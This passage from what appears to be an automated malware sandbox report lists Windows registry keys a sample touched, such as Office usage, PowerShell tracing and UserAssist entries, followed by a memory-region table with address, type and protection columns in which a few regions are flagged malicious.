HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Windows\System32\display.dll,-4
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Program Files\Windows Sidebar\sidebar.exe,-11100
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Windows\system32\themecpl.dll,-10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr\Bssvpr14\RKPRY.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
ProgramsCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr\Bssvpr14\JVAJBEQ.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr\Bssvpr14\JVAJBEQ.RKR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Handshake\{6F06CFDC-8B46-4289-9A59-403AE8C9352A}
data
There are 468 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
80000
system
page execute and read and write
malicious
310000
trusted library allocation
page read and write
malicious
3289000
trusted library allocation
page read and write
malicious
330000
unclassified section
page execute and read and write
malicious
2E0000
unclassified section
page execute and read and write
malicious
6A13000
heap
page read and write
3D17000
unkown
page read and write
11C000
stack
page read and write
62F0000
heap
page read and write
3B0C000
stack
page read and write
678F000
heap
page read and write
2420000
unkown
page read and write
180000
trusted library allocation
page read and write
3A4E000
stack
page read and write
22FA000
trusted library allocation
page read and write
7068000
unkown
page read and write
64D4000
heap
page read and write
402F000
stack
page read and write
4040000
unkown
page readonly
1B65000
heap
page read and write
390E000
stack
page read and write
23CB000
unkown
page read and write
2447000
direct allocation
page execute and read and write
1D20000
unkown
page readonly
10000
heap
page read and write
2610000
heap
page read and write
4384000
heap
page read and write
446B000
stack
page read and write
59F000
stack
page read and write
10000
heap
page read and write
332000
unkown
page execute read
67DA000
heap
page read and write
67E9000
heap
page read and write
D0000
heap
page read and write
6A4A000
heap
page read and write
22B0000
direct allocation
page execute and read and write
4A0000
trusted library allocation
page read and write
7535000
heap
page read and write
2380000
unkown
page read and write
3C80000
unkown
page read and write
1A0000
unkown
page readonly
2DC000
stack
page read and write
79A000
heap
page read and write
8410000
unkown
page read and write
68D5000
heap
page read and write
2420000
heap
page read and write
21C0000
direct allocation
page execute and read and write
38A0000
unkown
page read and write
24E0000
unkown
page read and write
5216000
heap
page read and write
53A0000
heap
page read and write
6B36000
heap
page read and write
7085000
unkown
page read and write
41FC000
stack
page read and write
3E98000
unkown
page read and write
30D000
stack
page read and write
343F000
stack
page read and write
680000
heap
page read and write
C54000
direct allocation
page execute and read and write
4050000
unkown
page readonly
33A000
unkown
page readonly
2299000
trusted library allocation
page read and write
6760000
stack
page read and write
124000
trusted library allocation
page read and write
5D50000
unkown
page read and write
74F000
heap
page read and write
2462000
heap
page read and write
66E1000
heap
page read and write
3ED4000
unkown
page read and write
2B9E000
stack
page read and write
20000
heap
page read and write
782000
heap
page read and write
41B000
remote allocation
page execute and read and write
6918000
heap
page read and write
4FF000
stack
page read and write
6565000
heap
page read and write
7123000
unkown
page read and write
74A000
heap
page read and write
3A50000
unkown
page readonly
24D4000
trusted library allocation
page read and write
47F9000
stack
page read and write
3309000
trusted library allocation
page read and write
1CA000
heap
page read and write
5B4000
heap
page read and write
2AF1000
unkown
page read and write
23DE000
stack
page read and write
221E000
stack
page read and write
60E0000
heap
page read and write
384000
heap
page read and write
1E60000
heap
page read and write
6699000
stack
page read and write
470000
trusted library allocation
page read and write
6D15000
heap
page read and write
83D0000
unkown
page read and write
1B60000
heap
page read and write
2140000
heap
page read and write
378000
heap
page read and write
3C70000
unkown
page readonly
622E000
heap
page read and write
3EEF000
stack
page read and write
370000
trusted library allocation
page execute and read and write
5E4000
heap
page read and write
2430000
unkown
page read and write
34B9000
trusted library allocation
page read and write
26B000
heap
page read and write
95E000
stack
page read and write
4360000
trusted library allocation
page read and write
DA0000
trusted library allocation
page read and write
6C90000
heap
page read and write
43D0000
trusted library allocation
page read and write
3D38000
unkown
page read and write
24CC000
stack
page read and write
241B000
heap
page read and write
497000
heap
page read and write
21D0000
direct allocation
page execute and read and write
6880000
heap
page read and write
2E0000
heap
page read and write
64FA000
heap
page read and write
4490000
trusted library allocation
page read and write
64D0000
heap
page read and write
27C9000
trusted library allocation
page read and write
389000
heap
page read and write
6ADB000
heap
page read and write
3DEC000
stack
page read and write
2C5F000
stack
page read and write
5AD000
heap
page read and write
AD4000
direct allocation
page execute and read and write
747000
heap
page read and write
20000
heap
page read and write
70A1000
unkown
page read and write
2737000
trusted library allocation
page read and write
90C000
unclassified section
page execute and read and write
33C000
unkown
page read and write
22EF000
stack
page read and write
3D10000
unkown
page read and write
8596000
system
page read and write
5A0000
heap
page read and write
8BD000
stack
page read and write
2455000
heap
page read and write
1B0000
heap
page read and write
4730000
unkown
page execute read
4E9B000
heap
page read and write
17B000
stack
page read and write
1B60000
heap
page read and write
6620000
heap
page read and write
27E9000
trusted library allocation
page read and write
246D000
heap
page read and write
6300000
heap
page read and write
8553000
unkown
page read and write
8510000
unkown
page read and write
439C000
stack
page read and write
286A000
unkown
page execute and read and write
1DD000
trusted library allocation
page execute and read and write
390000
heap
page read and write
3CC0000
unkown
page read and write
2717000
unclassified section
page execute and read and write
332F000
stack
page read and write
66ED000
heap
page read and write
75BD000
heap
page read and write
2444000
direct allocation
page execute and read and write
2410000
heap
page read and write
2324000
trusted library allocation
page read and write
2536000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
32B000
trusted library allocation
page execute and read and write
2C0000
heap
page read and write
3CB0000
unkown
page read and write
6C8C000
heap
page read and write
295E000
stack
page read and write
4050000
unkown
page readonly
40DC000
stack
page read and write
6FB7000
heap
page read and write
653A000
heap
page read and write
3E0000
heap
page read and write
6350000
heap
page read and write
537000
heap
page read and write
5D4000
heap
page read and write
5120000
heap
page read and write
400000
trusted library allocation
page read and write
23FD000
heap
page read and write
3D17000
unkown
page read and write
ECF000
stack
page read and write
280000
heap
page read and write
1FAF000
stack
page read and write
CD0000
direct allocation
page execute and read and write
21E5000
unkown
page read and write
4C1F000
stack
page read and write
1D7000
trusted library allocation
page execute and read and write
6A13000
heap
page read and write
3D10000
unkown
page read and write
1BD000
trusted library allocation
page execute and read and write
37A000
heap
page read and write
1D6000
heap
page read and write
10000
heap
page read and write
5AA000
heap
page read and write
8E0000
trusted library allocation
page read and write
3D00000
unkown
page readonly
2134000
heap
page read and write
4F1E000
stack
page read and write
6BB8000
heap
page read and write
6070000
system
page execute and read and write
298000
heap
page read and write
179000
stack
page read and write
2441000
direct allocation
page execute and read and write
66B9000
heap
page read and write
5DEE000
stack
page read and write
526E000
stack
page read and write
3AF0000
unkown
page read and write
720000
unkown
page readonly
914000
heap
page read and write
400000
unkown
page readonly
629E000
heap
page read and write
6BDB000
heap
page read and write
4200000
unkown
page read and write
878F000
system
page read and write
62AE000
stack
page read and write
3C4C000
stack
page read and write
1B40000
unkown
page read and write
669F000
heap
page read and write
3890000
unkown
page read and write
300000
trusted library allocation
page read and write
265A000
heap
page read and write
24F7000
trusted library allocation
page read and write
D10000
trusted library allocation
page execute and read and write
320000
heap
page read and write
2D70000
unkown
page read and write
4B7E000
stack
page read and write
A0E000
stack
page read and write | page guard
1CCD000
heap
page read and write
4020000
unkown
page readonly
6BA2000
heap
page read and write
1DF0000
direct allocation
page read and write
43D0000
trusted library allocation
page read and write
6B7E000
stack
page read and write
222000
trusted library allocation
page read and write
6820000
heap
page read and write
1B0000
trusted library allocation
page read and write
673E000
heap
page read and write
4F7000
heap
page read and write
24E0000
unkown
page read and write
514000
heap
page read and write
23C0000
unkown
page read and write
22C4000
direct allocation
page execute and read and write
1C0000
trusted library allocation
page read and write
3610000
heap
page read and write
5E02000
stack
page read and write
5D78000
unkown
page read and write
200000
heap
page read and write
A10000
trusted library allocation
page read and write
2435000
trusted library allocation
page read and write
2D90000
heap
page read and write
3ED0000
unkown
page read and write
530000
heap
page read and write
10000
heap
page read and write
900000
trusted library allocation
page read and write
6503000
heap
page read and write
5EE0000
system
page execute and read and write
2EAF000
stack
page read and write
2A40000
unkown
page readonly
4C1E000
stack
page read and write | page guard
2A5000
heap
page read and write
706A000
unkown
page read and write
3880000
unkown
page read and write
415E000
stack
page read and write
25A0000
heap
page read and write
2380000
unkown
page read and write
5188000
heap
page read and write
5D4000
heap
page read and write
5104000
heap
page read and write
43D0000
trusted library allocation
page read and write
2E9000
trusted library allocation
page read and write
10000
heap
page read and write
1B0000
trusted library allocation
page read and write
7068000
unkown
page read and write
28FF000
stack
page read and write
23B0000
unkown
page read and write
3AA1000
unkown
page read and write
27A1000
trusted library allocation
page read and write
789000
heap
page read and write
1A7000
stack
page read and write
1D0000
heap
page read and write
63BB000
heap
page read and write
56E000
heap
page read and write
49CD000
stack
page read and write
188000
stack
page read and write
16C000
stack
page read and write
25A5000
heap
page read and write
5111000
heap
page read and write
555000
heap
page read and write
2727000
trusted library allocation
page read and write
38B0000
unkown
page read and write
6AE5000
heap
page read and write
7740000
heap
page read and write
3B0000
heap
page read and write
226000
heap
page read and write
1D3000
trusted library allocation
page execute and read and write
647A000
heap
page read and write
7667000
heap
page read and write
9B0000
trusted library allocation
page read and write
740000
heap
page read and write
10000
heap
page read and write
63CF000
heap
page read and write
669A000
heap
page read and write
364000
heap
page read and write
368E000
stack
page read and write
7553000
heap
page read and write
43D0000
trusted library allocation
page read and write
2340000
trusted library allocation
page read and write
1B83000
heap
page read and write
4F82000
heap
page read and write
706F000
heap
page read and write
D9E000
stack
page read and write | page guard
8353000
unkown
page read and write
2152000
heap
page read and write
8392000
unkown
page read and write
18A000
stack
page read and write
4C6F000
stack
page read and write
7103000
unkown
page read and write
1B0000
trusted library allocation
page read and write
2413000
heap
page read and write
9ED000
heap
page read and write
931000
heap
page read and write
66E7000
heap
page read and write
2A7E000
stack
page read and write
272B000
trusted library allocation
page read and write
5E06000
heap
page read and write
6589000
unkown
page read and write
382B000
stack
page read and write
677A000
heap
page read and write
20000
unkown
page readonly
3F10000
unkown
page read and write
1CA000
heap
page read and write
3ED0000
unkown
page read and write
89E000
stack
page read and write
489F000
stack
page read and write
460000
trusted library allocation
page execute and read and write
2479000
heap
page read and write
3C80000
unkown
page read and write
DD0000
heap
page execute and read and write
2D99000
heap
page read and write
AD0000
direct allocation
page execute and read and write
678B000
heap
page read and write
39CC000
unkown
page read and write
9CC000
heap
page read and write
4EFE000
stack
page read and write
1B0000
trusted library allocation
page read and write
20BF000
stack
page read and write
2427000
heap
page read and write
6BD8000
heap
page read and write
170000
stack
page read and write
2EB1000
heap
page read and write
380D000
stack
page read and write
227000
trusted library allocation
page execute and read and write
3F9E000
stack
page read and write
51A7000
heap
page read and write
7103000
unkown
page read and write
4ED000
stack
page read and write
6730000
heap
page read and write
47C0000
heap
page read and write
77D0000
heap
page read and write
2491000
trusted library allocation
page read and write
38F000
heap
page read and write
AE0000
direct allocation
page execute and read and write
2CF0000
heap
page read and write
245D000
heap
page read and write
27FE000
stack
page read and write
332000
unkown
page execute read
D20000
heap
page execute and read and write
5151000
heap
page read and write
3BE000
heap
page read and write
27CB000
trusted library allocation
page read and write
3E82000
unkown
page read and write
7A90000
unkown
page read and write
246D000
heap
page read and write
24A1000
unkown
page read and write
5D78000
unkown
page read and write
1B0000
trusted library allocation
page read and write
A20000
heap
page read and write
472E000
stack
page read and write
2A88000
heap
page read and write
43D0000
trusted library allocation
page read and write
4CEE000
stack
page read and write
3A60000
unkown
page readonly
6281000
heap
page read and write
20000
heap
page read and write
23BB000
unkown
page read and write
66FE000
heap
page read and write
3A4E000
stack
page read and write
242E000
trusted library allocation
page read and write
27C1000
trusted library allocation
page read and write
3CD000
trusted library allocation
page execute and read and write
3E82000
unkown
page read and write
1C7000
stack
page read and write
410000
heap
page execute and read and write
32E1000
trusted library allocation
page read and write
84D3000
unkown
page read and write
5E30000
heap
page read and write
6FC5000
heap
page read and write
672E000
heap
page read and write
3AF0000
unkown
page read and write
1FBA000
heap
page read and write
2090000
heap
page read and write
22C000
stack
page read and write
362D000
heap
page read and write
535000
heap
page read and write
939000
heap
page read and write
25C3000
trusted library allocation
page read and write
69F0000
heap
page read and write
27C3000
trusted library allocation
page read and write
4BBE000
stack
page read and write
4F0000
heap
page read and write
10000
heap
page read and write
3DB1000
unkown
page read and write
600E000
stack
page read and write
7995000
heap
page read and write
1B4000
trusted library allocation
page read and write
26CF000
unclassified section
page read and write
3BF0000
unkown
page read and write
5244000
heap
page read and write
23D0000
trusted library allocation
page read and write
3760000
unkown
page read and write
6B90000
heap
page read and write
E52000
trusted library allocation
page read and write
13A000
trusted library allocation
page read and write
9E0000
direct allocation
page execute and read and write
695E000
heap
page read and write
10000
heap
page read and write
4E2000
heap
page read and write
1EE0000
heap
page read and write
260A000
unkown
page read and write
45FA000
stack
page read and write
2B0000
unkown
page read and write
780000
heap
page read and write
669B000
stack
page read and write
2611000
heap
page read and write
1B7000
heap
page read and write
2C90000
unkown
page readonly
2465000
heap
page read and write
78F000
stack
page read and write
1D4000
trusted library allocation
page read and write
64D0000
heap
page read and write
5DA000
heap
page read and write
66E5000
heap
page read and write
657D000
stack
page read and write
5ED9000
stack
page read and write
5262000
heap
page read and write
5E07000
stack
page read and write
3410000
trusted library allocation
page read and write
660F000
heap
page read and write
6506000
heap
page read and write
9B4000
heap
page read and write
70F2000
unkown
page read and write
23C0000
unkown
page read and write
6B77000
heap
page read and write
52E000
heap
page read and write
54C000
heap
page read and write
4F6D000
stack
page read and write
66EA000
heap
page read and write
69F4000
heap
page read and write
330000
unkown
page readonly
60FE000
stack
page read and write
7123000
unkown
page read and write
7EF40000
trusted library allocation
page execute and read and write
2B95000
trusted library allocation
page read and write
25CA000
trusted library allocation
page read and write
A0F000
stack
page read and write
66E1000
trusted library allocation
page read and write
427000
heap
page read and write
C00000
trusted library allocation
page read and write
472E000
stack
page read and write
2C5F000
stack
page read and write
26E9000
trusted library allocation
page read and write
516000
heap
page read and write
1CFA000
unkown
page read and write
91F000
heap
page read and write
983000
heap
page read and write
20000
heap
page read and write
3C90000
unkown
page readonly
43D0000
trusted library allocation
page read and write
720000
unkown
page readonly
683B000
stack
page read and write
1D2000
trusted library allocation
page read and write
25F0000
unclassified section
page execute and read and write
66B7000
heap
page read and write
1C4000
heap
page read and write
3F10000
unkown
page read and write
685C000
heap
page read and write
4918000
stack
page read and write
71E000
stack
page read and write
62FE000
heap
page read and write
26F3000
trusted library allocation
page read and write
64A5000
heap
page read and write
4BDE000
stack
page read and write
660C000
heap
page read and write
24C0000
direct allocation
page execute and read and write
7990000
heap
page read and write
3CF0000
unkown
page readonly
593000
heap
page read and write
9EB000
heap
page read and write
390000
heap
page read and write
53BD000
heap
page read and write
3C0D000
stack
page read and write
7995000
heap
page read and write
730000
trusted library allocation
page read and write
1F6F000
stack
page read and write
347000
heap
page read and write
227F000
stack
page read and write
E0000
unkown
page read and write
43D0000
trusted library allocation
page read and write
653D000
heap
page read and write
5202000
heap
page read and write
5D50000
heap
page read and write
523D000
stack
page read and write
6D79000
heap
page read and write
8392000
unkown
page read and write
2C90000
unkown
page readonly
E0000
unkown
page read and write
480000
trusted library allocation
page read and write
3A50000
unkown
page readonly
2A5000
heap
page read and write
77D0000
heap
page read and write
2D95000
heap
page read and write
4DA0000
heap
page read and write
68A7000
heap
page read and write
3E59000
unkown
page read and write
73E000
stack
page read and write
2010000
trusted library allocation
page execute and read and write
420000
heap
page read and write
5DEF000
heap
page read and write
716B000
unkown
page read and write
400000
unkown
page readonly
4DB0000
heap
page read and write
2D99000
heap
page read and write
CBE000
stack
page read and write
7E0000
trusted library allocation
page execute and read and write
5D5000
heap
page read and write
69F4000
heap
page read and write
6705000
heap
page read and write
5D4000
heap
page read and write
D00000
trusted library allocation
page read and write
728000
heap
page read and write
4D90000
heap
page read and write
4ADE000
stack
page read and write
6777000
heap
page read and write
4C90000
heap
page read and write
35D0000
heap
page read and write
3E0000
trusted library allocation
page read and write
16C000
stack
page read and write
6563000
heap
page read and write
3D38000
unkown
page read and write
3C70000
unkown
page readonly
9D0000
direct allocation
page execute and read and write
3A80000
unkown
page execute and read and write
3CF0000
unkown
page readonly
2A40000
unkown
page readonly
720000
heap
page read and write
1B0000
trusted library allocation
page read and write
23FE000
heap
page read and write
3ED000
heap
page read and write
4960000
heap
page execute and read and write
412F000
stack
page read and write
1DE0000
heap
page read and write
2360000
trusted library allocation
page read and write
241F000
stack
page read and write
29D000
stack
page read and write
20000
heap
page read and write
24B0000
direct allocation
page execute and read and write
1EA000
trusted library allocation
page read and write
6B18000
heap
page read and write
6910000
heap
page read and write
2700000
trusted library allocation
page read and write
1B0000
heap
page read and write
3E59000
unkown
page read and write
4C0E000
stack
page read and write
3F05000
unkown
page read and write
67B0000
heap
page read and write
5DDE000
stack
page read and write
1B0000
trusted library allocation
page read and write
401E000
stack
page read and write
99D000
stack
page read and write
A94F000
stack
page read and write
2030000
heap
page read and write
6233000
heap
page read and write
51F000
heap
page read and write
D10000
trusted library allocation
page read and write
DC0000
trusted library allocation
page read and write
5E0000
heap
page read and write
1BE0000
unkown
page readonly
21AE000
unkown
page read and write
99E000
stack
page read and write
839B000
unkown
page read and write
300000
unkown
page read and write
1FBE000
stack
page read and write
290000
trusted library allocation
page execute and read and write
7096000
unkown
page read and write
188000
stack
page read and write
2120000
heap
page read and write
DF0000
trusted library allocation
page execute and read and write
23BB000
unkown
page read and write
2418000
heap
page read and write
6EC7000
heap
page read and write
1CFA000
unkown
page read and write
1DBF000
stack
page read and write
570000
heap
page read and write
5E02000
stack
page read and write
D0E000
stack
page read and write
4F7F000
heap
page read and write
4B0000
heap
page read and write
89000
stack
page read and write
457E000
stack
page read and write
1F3B000
heap
page read and write
C20000
trusted library allocation
page read and write
4AE0000
heap
page read and write
4740000
unkown
page read and write
640A000
heap
page read and write
5D4000
heap
page read and write
10000
heap
page read and write
120000
trusted library allocation
page read and write
227E000
stack
page read and write | page guard
6B6B000
heap
page read and write
66BE000
heap
page read and write
24D6000
unclassified section
page read and write
84D3000
unkown
page read and write
6AF2000
heap
page read and write
4220000
heap
page read and write
488E000
stack
page read and write
74A000
heap
page read and write
98E000
heap
page read and write
45BC000
stack
page read and write
7980000
heap
page read and write
260000
trusted library allocation
page execute and read and write
2407000
unkown
page read and write
6726000
heap
page read and write
428E000
stack
page read and write
43D0000
trusted library allocation
page read and write
22D0000
direct allocation
page execute and read and write
7A10000
heap
page read and write
226000
heap
page read and write
23D0000
unkown
page read and write
7CC000
stack
page read and write
6627000
heap
page read and write
260000
trusted library allocation
page read and write
310000
trusted library allocation
page execute and read and write
19B000
stack
page read and write
AB0E000
stack
page read and write
59E000
heap
page read and write
5E6000
heap
page read and write
51C3000
heap
page read and write
3C50000
unkown
page readonly
6898000
heap
page read and write
46DE000
stack
page read and write
64F0000
heap
page read and write
10000
heap
page read and write
3945000
stack
page read and write
7095000
unkown
page read and write
6FB0000
heap
page read and write
2404000
heap
page read and write
6113000
system
page execute and read and write
4B5F000
stack
page read and write
74B000
heap
page read and write
6B20000
heap
page read and write
660000
heap
page read and write
7A10000
heap
page read and write
234E000
unkown
page read and write
1A0000
trusted library allocation
page read and write
390000
trusted library allocation
page read and write
498000
heap
page read and write
5DF5000
heap
page read and write
2D9E000
heap
page read and write
57F000
heap
page read and write
22E1000
trusted library allocation
page read and write
74E000
heap
page read and write
2340000
direct allocation
page execute and read and write
4CAB000
stack
page read and write
2455000
heap
page read and write
5A1000
heap
page read and write
1DBF000
stack
page read and write
3770000
unkown
page read and write
6D55000
heap
page read and write
4C4E000
stack
page read and write | page guard
2330000
direct allocation
page execute and read and write
7E0000
heap
page read and write
682F000
stack
page read and write
2040000
heap
page read and write
250000
heap
page read and write
7662000
heap
page read and write
246D000
heap
page read and write
2301000
trusted library allocation
page read and write
35AE000
stack
page read and write
4FFE000
stack
page read and write
5100000
heap
page read and write
212D000
stack
page read and write
382B000
stack
page read and write
500000
trusted library section
page read and write
356E000
stack
page read and write
6ADE000
heap
page read and write
3B90000
stack
page read and write
DD6000
heap
page execute and read and write
2AE0000
unkown
page read and write
7456000
heap
page read and write
360000
trusted library allocation
page read and write
2F0000
heap
page read and write
66A3000
heap
page read and write
7EF20000
trusted library allocation
page execute and read and write
716B000
unkown
page read and write
7530000
heap
page read and write
22F000
unkown
page read and write
320000
heap
page read and write
26D2000
unkown
page read and write
AD7000
direct allocation
page execute and read and write
66A6000
heap
page read and write
2ACA000
stack
page read and write
4F30000
heap
page read and write
2452000
heap
page read and write
DB000
stack
page read and write
7990000
heap
page read and write
51D000
heap
page read and write
3F7000
heap
page read and write
6560000
heap
page read and write
445000
heap
page read and write
461E000
stack
page read and write
3C8F000
stack
page read and write
DEE000
stack
page read and write
3770000
unkown
page read and write
E6E000
stack
page read and write
64FF000
heap
page read and write
3F9E000
stack
page read and write
8410000
unkown
page read and write
6459000
heap
page read and write
539E000
stack
page read and write
2420000
unkown
page read and write
6331000
heap
page read and write
7148000
unkown
page read and write
538000
heap
page read and write
3AE000
heap
page read and write
6CD9000
heap
page read and write
682F000
stack
page read and write
234E000
unkown
page read and write
179000
stack
page read and write
2080000
heap
page execute and read and write
352C000
stack
page read and write
958000
heap
page read and write
6C90000
heap
page read and write
6BE3000
heap
page read and write
686B000
heap
page read and write
389000
heap
page read and write
1D30000
unkown
page readonly
3C10000
unkown
page read and write
465B000
stack
page read and write
418D000
stack
page read and write
2607000
unkown
page read and write
5C4000
heap
page read and write
4AF000
stack
page read and write
27D5000
trusted library allocation
page read and write
34EF000
stack
page read and write
740000
heap
page read and write
935000
heap
page read and write
790000
heap
page read and write
4750000
heap
page execute and read and write
724000
heap
page read and write
64D2000
heap
page read and write
4E40000
heap
page read and write
25C5000
trusted library allocation
page read and write
19C000
stack
page read and write
3740000
unkown
page readonly
3CCF000
stack
page read and write
2968000
stack
page read and write
683B000
stack
page read and write
2F4000
heap
page read and write
244D000
heap
page read and write
20000
unkown
page readonly
2137000
heap
page read and write
A28000
heap
page read and write
1F04000
heap
page read and write
2450000
direct allocation
page execute and read and write
347000
heap
page read and write
44A5000
trusted library allocation
page read and write
21E5000
unkown
page read and write
64A7000
heap
page read and write
93C000
system
page execute and read and write
44AE000
stack
page read and write
4730000
unkown
page execute read
2474000
heap
page read and write
5F0E000
stack
page read and write
1E0000
trusted library allocation
page read and write
22FE000
trusted library allocation
page read and write
7535000
heap
page read and write
27E000
stack
page read and write
68E000
stack
page read and write
10000
heap
page read and write
1D4000
trusted library allocation
page read and write
8BF000
stack
page read and write
3FEF000
stack
page read and write
260A000
unkown
page read and write
23E0000
unkown
page readonly
3C30000
unkown
page read and write
7148000
unkown
page read and write
61CB000
heap
page read and write
AE2F000
stack
page read and write
D6E000
stack
page read and write
2440000
heap
page read and write
4B4000
heap
page read and write
26D2000
unkown
page read and write
8D0000
system
page execute and read and write
21B000
stack
page read and write
7085000
unkown
page read and write
31E000
unkown
page read and write
2704000
trusted library allocation
page read and write
65F000
stack
page read and write
4930000
heap
page read and write
3A7F000
stack
page read and write
364000
heap
page read and write
3940000
heap
page read and write
215000
trusted library allocation
page execute and read and write
4020000
unkown
page readonly
621F000
heap
page read and write
